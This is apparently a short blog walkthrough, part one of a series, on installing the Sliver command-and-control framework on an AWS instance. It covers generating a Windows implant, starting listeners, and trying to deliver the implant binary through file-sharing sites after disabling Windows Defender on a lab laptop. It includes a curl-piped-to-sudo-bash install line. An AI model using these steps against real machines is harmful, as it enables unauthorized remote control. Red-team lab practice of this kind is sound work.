Sliver 1/4 🐍

JayHill
5 min readNov 3, 2022

Intro

A walk-through on how to Install sliver in ec2, manually turn off windows defender & get an implant session on windows lab laptop used for testing.

By reading this you accept that I do not accept responsibility for how you use of this guide / tool and it should only be used for educational purposes only.

Installation
https://github.com/BishopFox/sliver

Open AWS
Connect to your instance via ssh.

Once connected update and upgrade your instance,

Use this one liner below to get up and running with the dependencies for sliver and start it.

curl https://sliver.sh/install|sudo bash

and then run sliver

Generating Implants

I typed: generate - -mtls <ec2ip> - -a x86 — os windows

Different generate flag options above.

run : http

then

mtls

This will start listeners needed to connect to the implant created earlier.

Shipping the binary

Next step was to start figuring out how to ship the binary. At first I used Anonfiles but eventually it stopped working. I used drop box as well before I was shortly banned after initially testing it upload of the sliver.exe

JayHill

Information Security Research 🧿💻